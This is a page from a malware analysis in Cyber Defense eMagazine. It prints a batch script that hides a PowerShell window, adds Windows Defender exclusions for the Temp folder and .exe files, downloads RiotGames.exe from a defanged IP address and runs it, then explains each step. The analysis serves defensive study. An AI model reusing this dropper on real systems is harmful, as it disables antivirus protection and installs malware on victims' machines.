Script:

            @echo off

            PowerShell.exe        -WindowStyle        hidden       "Add-MpPreference         -ExclusionExtension
            "%userprofile%\AppData\Local\Temp";  "Add-MpPreference  -ExclusionExtension  ".exe";Start-Sleep  -
            Seconds      5;   "Invoke-WebRequest       'http://141[.]95[.]16[.]111:8080/RiotGames.exe'   -OutFile
            '%userprofile%\AppData\Local\Temp\RiotGames.exe'";                      cmd.exe                    /c
            %userprofile%\AppData\Local\Temp\RiotGames.exe



            The script appears to download and execute an external executable (RiotGames.exe) from a remote
            location. Based on the script's content, it appears to perform the following actions:



               •  Add exclusions for the %userprofile%\AppData\Local\Temp directory and all files with the .exe
                   extension in Windows Defender.
               •  Download       a     file    named      RiotGames.exe       from     the     specified    URL
                   (http://141[.]95[.]16[.]111:8080/RiotGames.exe)      and       save       it      to      the
                   %userprofile%\AppData\Local\Temp directory.
               •  Execute the RiotGames.exe file using cmd.exe.



            The binary “RiotGames.exe” is 32bit PE executable, written in Visual C++ and recent compiler/debugger
            time stamp of May 2023. The binary is not packed.























            Cyber Defense eMagazine – October 2023 Edition                                                                                                                                                                                                          91
            Copyright © 2023, Cyber Defense Magazine. All rights reserved worldwide.